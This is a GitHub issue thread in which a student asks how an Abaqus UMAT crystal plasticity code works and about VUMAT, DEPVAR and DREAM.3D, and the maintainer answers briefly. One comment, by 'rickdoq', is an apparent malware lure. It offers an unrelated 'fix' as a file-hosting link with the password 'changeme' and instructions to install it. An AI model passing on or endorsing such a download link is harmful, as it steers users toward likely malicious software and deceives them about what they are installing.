### ISSUE TITLE
UNABLE TO UNDERSTAND THE UMAT CODE G

### ISSUE THREAD

**Issue by Abhinab-iit-112** [TarletonGroup/CrystalPlasticity#71]
Dear Sir,
I am unable to understand the UMAT code you have given in this Zip file.(OXFORD_UMAT.F)
If you can help me understand the code, it will be heplful for me and my project work.
Doubts:- 
1. Is the code structure same for all ?
2. For Micro-extrusion at high temp , SHOULD I USE UMAT OR VUMAT and if so what are the Requirements writing the program (Code STRUCTURE)?
3. Is it possible  to create Cylindrical microstructure in DREAM 3D and if NO, then how to assign the properties, phases and orientation in ABAQUS (if we are creating model there itself.)
4.What is the role of DEPVAR and how Material Properties are being assigned via USER MATERIAL?

(Please Reply me with the ABOVE 5 DOUBTS and please make me CLEAR.)
@EralpDemir 
Regards
Abhinab

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by EralpDemir** [comment]
1. The code structure is same for VUMAT or UMAT. 
2. UMAT is available already so I recommend UMAT. It can be converted to VUMAT with the correct formatting if you need to.
3. I am not sure about it, please ask it to Dream3D community.
4. Please check abaqus help file for this.
